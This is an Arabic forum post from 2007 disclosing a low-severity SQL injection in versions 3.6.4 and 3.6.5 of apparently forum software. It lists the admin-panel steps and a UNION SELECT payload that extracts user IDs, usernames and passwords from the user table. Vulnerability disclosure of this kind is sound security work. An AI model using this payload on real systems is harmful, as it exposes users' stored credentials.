ثغرة مجربة على 3.6.5 و 3.6.4 "جديدة" من نوع sql injection

18-May-2007, 05:38 PM

النسخ المصابة :
3.6.5
3.6.4

نوع الثغرة :
sql injection

خطورتها :
ليست خطره ابدا لان تنفيذها يتم بواسطة مدير الموقع

طريقة التنفيذ :
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

كود PHP:

  ) union select 1,1,1,1,1,userid,password,1,username from user -- 9

تحياتي
ابو عمار

19-May-2007, 02:06 PM

..

تسلم والله

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طرق مشاهدة الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

خدمات أون لاين	عارض الالوان \| صانع الميتا تاج \| صانع الاعلانات المنبثقة \| ترتيب موقعك \| البحث عن دومين \| جدول الالوان \| صانع السكرول بار \| صانع صفحة التحويل استعلام عن IP \| قياس سرعة الانترنت \| دخول CPanel & WHM \| مولد كلمات المرور لينكات
الشركات والمواقع	الشركات الرسمية \| شركات الإستضافة \| شركات التصميم \| الشركات الاعلانية \| شركات الدعم الفني \| مواقع الإعلانات التجارية \| مواقع التبادل الإعلاني لينكات
المنتديات	البرامج العامه \| تطوير المنتديات \| استايلات النسخة الثالثة \| مكتبة هاكات الجيل الثالث \| المشاكل وحلولها \| ثغرات المنتديات وترقيعها \| معرض التصاميم وبرامج التصميم \| تطوير المواقع \| لغات برمجة المواقع \| منتدى الديجي شات Digichat \| عروض البيع والشراء \| الشركات وتبادل الخبرات \| الشركات وتبادل الخبرات \| الـ VPS والريسلرات \| التقنيه و الأمن و الحماية \| السيرفرات لينكات